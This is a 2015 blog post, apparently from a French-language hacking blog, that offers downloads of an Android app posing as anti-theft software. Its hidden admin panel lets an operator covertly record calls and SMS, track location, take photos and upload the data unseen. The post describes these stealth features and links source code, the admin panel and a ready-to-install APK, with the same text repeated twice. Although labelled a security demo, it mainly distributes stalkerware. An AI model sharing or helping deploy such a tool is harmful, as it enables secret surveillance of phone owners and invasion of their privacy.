Control a Remote Phone via Webserver - Android Security
~
mercredi 28 janvier 2015
Libellés :
Android
,
HACKING
,
Open Source
An app that can record phones, sms, track location changes, silently take pictures etc. and watch all the fun beeing uploaded to a webconsole from where you control the smartphone with dynamic updates using WEBVIEW.
This software consists of three parts: source for installing app on android device (in AndroidAntiTheft folder) webserver with all necessary scripts/files to control remote phone (in admin_panel folder) DB (in folder DB) additionally a older compiled apk file is attached a swell - ready to download and install on your device.
what it does
the application "acts" as an antitheft software. The moment you install it it helps you track your phone. with an IMEA code displayed after staring you can log into the webserver and see where your phone is. This is the non malicious part. The malicious part: the admin (hacker) in this security demo can also log into another part of the webserver and enable installed features within the app (hidden to the user). He can activate features like phone recording, sms recording etc. all enabled features result in an stealth upload of all data to the webserver, where the admin can take a closer look at the data.
You can download the source by clicking on "Source". Then navigate to "browse". Then navigate to the correct tree (most times its trunk". On the right side you will find the files. If you wan't to download e.g. an already comiled exe you can click on the "exe" in the right window. It will tell you that the file is too big to display. But on the left side you can still see a link "view raw file". Right mouse click on that and "save as". you will then be able to save the exe. In case you want to only download the already compiled version (not source code included please click on this link:
Source: https://drive.google.com/file/d/0Bxfib9ZpfZLaOGRVa1pFRnBVOVE/edit?usp=sharing Admin Panel: https://drive.google.com/file/d/0Bxfib9ZpfZLaQ2JBSXNnaG1STDA/edit?usp=sharing Old APK (compile new one!): https://drive.google.com/file/d/0Bxfib9ZpfZLaaFRkVVkxaWFvUEU/edit?usp=sharing
This software consists of three parts: source for installing app on android device (in AndroidAntiTheft folder) webserver with all necessary scripts/files to control remote phone (in admin_panel folder) DB (in folder DB) additionally a older compiled apk file is attached a swell - ready to download and install on your device.
what it does
the application "acts" as an antitheft software. The moment you install it it helps you track your phone. with an IMEA code displayed after staring you can log into the webserver and see where your phone is. This is the non malicious part. The malicious part: the admin (hacker) in this security demo can also log into another part of the webserver and enable installed features within the app (hidden to the user). He can activate features like phone recording, sms recording etc. all enabled features result in an stealth upload of all data to the webserver, where the admin can take a closer look at the data.
You can download the source by clicking on "Source". Then navigate to "browse". Then navigate to the correct tree (most times its trunk". On the right side you will find the files. If you wan't to download e.g. an already comiled exe you can click on the "exe" in the right window. It will tell you that the file is too big to display. But on the left side you can still see a link "view raw file". Right mouse click on that and "save as". you will then be able to save the exe. In case you want to only download the already compiled version (not source code included please click on this link:
Source: https://drive.google.com/file/d/0Bxfib9ZpfZLaOGRVa1pFRnBVOVE/edit?usp=sharing Admin Panel: https://drive.google.com/file/d/0Bxfib9ZpfZLaQ2JBSXNnaG1STDA/edit?usp=sharing Old APK (compile new one!): https://drive.google.com/file/d/0Bxfib9ZpfZLaaFRkVVkxaWFvUEU/edit?usp=sharing
Articles
1 commentaires :
No install.php in admin panel!
Enregistrer un commentaire